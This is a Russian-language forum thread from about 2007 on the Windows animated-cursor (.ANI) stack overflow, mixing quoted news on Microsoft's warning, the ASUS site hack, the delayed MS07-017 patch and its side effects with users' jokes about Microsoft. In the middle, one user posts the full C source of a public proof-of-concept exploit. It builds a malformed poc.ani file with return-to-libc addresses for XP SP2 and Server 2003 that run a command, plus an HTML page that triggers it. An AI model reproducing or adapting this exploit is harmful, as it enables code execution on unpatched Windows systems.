Уязвимости Windows

[d1sco]

Windows уязвима через анимированные курсоры

Цитата: Microsoft предупреждает всех пользователей ОС Windows об ее очередном огрехе. Пользователи могут стать жертвами хакеров, загрузив анимированные курсоры. По рекомендации компании следует избегать контакта с файлами расширения .ani, которые могут подослать в письме – эти файлы нужно незамедлительно удалять, а лучше вообще отказаться от загрузки анимированных курсоров. Изначально тревогу подняла организация SANS (Sans Internet Storm Center), которая нашла несколько сайтов, содержащих на своих страницах код для копирования .ani-файлов на компьютер жертвы. После этого компьютер пользователя становится марионеткой хакера. McAfee, излагая свою точку зрения, говорит, что заражение происходит быстро и тихо. После того как зараженные курсоры окажутся на компьютере жертвы, они могут скачать другие вредоносные файлы, трояны, шпионские программы. В Microsoft говорят о необходимости обновления антивирусных баз и блокировки загрузки фалов расширения .ani. Но специалисты по антивирусам заявляют о возможности передачи .ani-кода через другой формат файлов.

playground.ru

[ArcFi]

Сообщение от d1sco Windows уязвима через анимированные курсоры

...
Бу-Га-Га!
*Без комментариев*

[d1sco]

ArcFi Будь ты немного повнимательнее, то прочитал бы ещё тему в разделе аппаратная "Asus и Gigabyte создают общее предприятие", в которой написано, что совсем недавно именно из-за этой уязвимости с файлами расширением .ani хакерами был выведен из строя оффициальный сайт компании ASUSTek Computers.

Цитата: Некие хакеры взяли и взломали сайт компании ASUStek Computer. Произошло это событие 6-го апреля. Вследствие этих деяний вышеупомянутый сайт «накрылся», то есть был заблокирован. Сайт был поражен через уязвимость, связанную с файлами расширения .ani. Компания Asus является известным производителем материнских плат, видеокарт, ноутбуков, которые довольно давно уже славятся своим качеством. Этот взлом уже не первый для этого сайта, в декабре прошлого года на главной странице было размещено шпионское ПО. Причина столь неприязненного отношения хакеров к этому сайту неизвестна, из стана компании также не поступило ни одного комментария по сложившейся ситуации.

[ArcFi]

Новости в продолжение банкета...

Цитата: http://www.uinc.ru/news/sn7575.html Microsoft знала об ANI-уязвимости ещё в декабре прошлого года - 4/04/2007 11:51 Как указывает в своём блоге на ZDNet Ryan Naraine, Microsoft была извещена о наличии уязвимости при обработке файлов анимированных курсоров (.ANI) в декабре прошлого года всё тем же Александром Сотировым из Determina. 7 января этого года Microsoft зарезервировала соответствующий бюллетень CVE-2007-0038 для того. чтобы ссылаться на него в будущей заплатке. Тем не менее, выпустив уже 16 патчей в текущем году, именно эта опаснейшая (как следует из её описания) уязвимость так и оставалась открытой. Один из представителей из Редмонда подтвердил, что Determina сообщила Microsoft об уязвимости, однако о причинах подобной "медлительности" Microsoft начал долго и нудно рассказывать о том, как это трудно выпускать патчи и заниматься безопасностью. Хотелось бы заметить, что, пока M$ соизволила таки вчера экстренно выпустить внеплановый патч, двумя независимыми компаниями (одна из которых - известная eEye Digital Security) выпустили сторонний патч для устранения уязвимости. Microsoft пыталась оправдываться, что для проведения атаки необходимы некоторые аспекты социальной инженерии (например, вынудить пользователя прочитать почту), однако, учитывая квалификацию и "обезянье любопытство" большинства пользователей "ОС для домохозяек" можно предположить в скором времени появлении очередной пачки заражённых компьютеров. Как указывают специалисты из Determina, эксплоит для уязвимости довольно тривиален.

*И как после такого не постебаться чуток над MS? *
d1sco, кто бы мог подумать, что несчастное .ani столько бед принесёт...

[XeNoN]

Можете поиздеваться над своими M$ Windows. Да и в файлике этом описание уязвимости лучше.

Код:

/*
* version 0.5
* Copyright (c) 2007 devcode
*
*
*            ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow For Hardware DEP XP SP2
* [CVE-2007-1765]
*
*
* Description:
*    A vulnerability has been identified in Microsoft Windows,
*    which could be exploited by remote attackers to take complete
*    control of an affected system. This issue is due to a stack overflow
*    error within the "LoadAniIcon()" [user32.dll] function when rendering
*    cursors, animated cursors or icons with a malformed header, which could
*    be exploited by remote attackers to execute arbitrary commands by
*    tricking a user into visiting a malicious web page or viewing an email
*    message containing a specially crafted ANI file.
*
* Hotfix/Patch:
*    None as of this time.
*
* Vulnerable systems:
*      Microsoft Windows 2000 Service Pack 4
*      Microsoft Windows XP Service Pack 2
*      Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
*      Microsoft Windows XP Professional x64 Edition
*      Microsoft Windows Server 2003
*      Microsoft Windows Server 2003 (Itanium)
*      Microsoft Windows Server 2003 Service Pack 1
*      Microsoft Windows Server 2003 Service Pack 1 (Itanium)
*      Microsoft Windows Server 2003 x64 Edition
*      Microsoft Windows Vista
*
*      Microsoft Internet Explorer 6
*      Microsoft Internet Explorer 7
*
* Tested on:
*      Microsoft XP SP2 + DEP + Internet Explorer 6
*
*    This is a PoC and was created for educational purposes only. The
*    author is not held responsible if this PoC does not work or is
*    used for any other purposes than the one stated above.
*
*    Credit goes to HOD (if he/they exist :P) for the html. Works on
*    XP SP2 with Hardware DEP enabled, go figure.
*
*    ^^ shoutz to Wonk(if he exists r0fl), InTeL, thrasher :)
*
*
*/
#include <iostream>
#include <windows.h>

/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

/* system("calc.exe"); */
char szExecute[] = "logoff.exe\x00";

unsigned char uszHtml[] =
"<html>"
"Microsoft Windows .ANI LoadAniIcon Exploit"
"<br>Copyright (c) 2007 devcode<br>"
"<style>" \
"* {CURSOR: url(\"poc.ani\")}</style></head>"
"</html>";

/* Usage: ani.exe 1*/
char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\t(0) Kernel32.dll (ExitProcess)\n"
"\t(1) Windows XP SP2 + DEP\n"
"\t(2) Windows 2003 Server\n"
"Usage: ani.exe <target>";

/* RET2LIBC attack */
typedef struct {
    const char *szTarget;
    /* kernel32.dll - set the proper stack frame
        LEA EBP, DWORD PTR SS:[ESP+10]
        SUB ESP, EAX
        PUSH EBX
        PUSH ESI
        PUSH EDI
        ....
        ....
        RETN
    */
    unsigned char uszRet[5];
    /* msvcrt.dll - system() */
    unsigned char uszMsvcrtCall[5];
} TARGET;

TARGET targets[] = {
    { "Kernel32.dll (ExitProcess)", "\x90\x90\x90\x90", "\x90\x90\x90\x90" },
    { "Windows XP SP2", "\xD6\x24\x80\x7C", "\xC7\x93\xC2\x77" },
    { "Windows 2003 Server", "\x0A\x17\xE4\x77", "\x10\x8C\xBB\x77" }
};

int main( int argc, char **argv ) {
    char szBuffer[1024];
    FILE *f;
    void *pExitProcess[4];

    if ( argc < 2 ) {
        printf("%s\n", szIntro );
        return 0;
    }

    if ( atoi( argv[1] ) == 0 ) {
        printf("[+] Getting ExitProcess address...\n");
        *pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ), 
"ExitProcess" );
        if ( pExitProcess == NULL ) {
            printf("[-] Cannot get ExitProcess address\n");
            return 0;
        }
        memcpy( targets[1].uszRet, pExitProcess, 4 );
    }

    printf("[+] Creating ANI header...\n");
    memset( szBuffer, 0x90, sizeof( szBuffer ) );
    memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

    printf("[+] Copying execution code...\n");
    memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
    memset( szBuffer + 136, 0, 4 );
    memset( szBuffer + 204, 0, 4 );
    szBuffer[136] = 0x6C;
    szBuffer[204] = 0x6C;
    memcpy( szBuffer + 196, targets[atoi(argv[1])].uszMsvcrtCall, 4 );
    memcpy( szBuffer + 200, targets[atoi(argv[1])].uszMsvcrtCall, 4 );
    memcpy( szBuffer + 240, szExecute, sizeof( szExecute ) - 1 );

    f = fopen( "poc.ani", "wb" );
    if ( f == NULL ) {
        printf("[-] Cannot create ani file\n");
        return 0;
    }

    fwrite( szBuffer, 1, 1024, f );
    fclose( f );
    printf("[+] .ANI file succesfully created!\n");

    f = fopen( "poc.html", "wb" );
    if ( f == NULL ) {
        printf("[-] Cannot create html file\n");
        return 0;
    }

    fwrite( uszHtml, 1, sizeof( uszHtml ), f );
    fclose( f );
    printf("[+] HTML file succesfully created!\n");

    return 0;
}

Добавлено через 5 минут

Цитата: *И как после такого не постебаться чуток над MS? *

ArcFi, так легко, это же банальное переполнение буфура, такими ошибками грешат многие приложения. Правда в случае с Windows, при неумелом использовании, такие ошибки чаще всего становятся очень и очень вредоносными.

Цитата: d1sco, кто бы мог подумать, что несчастное .ani столько бед принесёт...

Помнится были перопелнения буфера при работе с bmp, png и прочими вещами. Да и браузеры сплошь и рядом такими проблемами страдали, поэтому не стоит недооценивать такие уязвимости, тем более когда речь идет о Windows с которой в большинстве случаев работают из под учетной записи администратора.
Хотя меня больше прикалывает уязвимость в Windows, когда непривеллегированное приложение может управлять графическим интерфейсом привеллегированного.

[KarnAth]

Ха. Опять у них критикал %) Пусть микрософт попаникует, им не впервой )

[a2z]

Официальное исправление "курсорной уязвимости" Windows добавляет еще ряд проблем

Цитата: Корпорация Microsoft, вопреки обещанной задержке до 10 апреля, все же выпустила официальное исправление, известное как бюллетень по безопасности под номером MS07-017. Это не что иное, как средство для устранения описанной несколько дней назад уязвимости, связанной с использованием вредоносного кода в анимационном курсоре мыши. Напомню, что данной уязвимости подвержены все продукты линейки NT, а именно Windows 2000, XP, 2003 и Vista в различных вариантах для системных архитектур x86 и х64. Она приводила к ошибке основной оболочки Windows Explorer и постоянному перезапуску. После выхода данного обновления с устранением одной проблемы появился ряд других, которые фактически сведены к ответственности производителей вспомогательного ПО под Windows. Так, например, официально подтверждено, что после установки данной заплатки может прекратить работать панель управления аудиоустройством на базе HD Audio кодеков от Realtek, также пользователи сообщают о проблемах при работе некоторых других программ, в частности антивирусных пакетов производства компаний AVG и F-Secure. Последним в свою очередь ничего не остается, как выпускать принудительные обновления, которые будут доступны несколько позднее. Кроме того, некоторые пользователи сайта Neowin отрапортовали о невозможности загрузки операционной системы после применения заплатки, правда какой именно и при каких обстоятельствах, неизвестно. Так что на текущий момент перед пользователем стоит задача, либо последовать официальной рекомендации, либо же работать на свой страх и риск с «дырявой» системой.

http://overclockers.ru/softnews/25248.shtml

[Lord_Dragon]

Как обычно выпустят заплатку, а на неё придётся ставить ещё две от предыдущей заплатки и от уязвимости.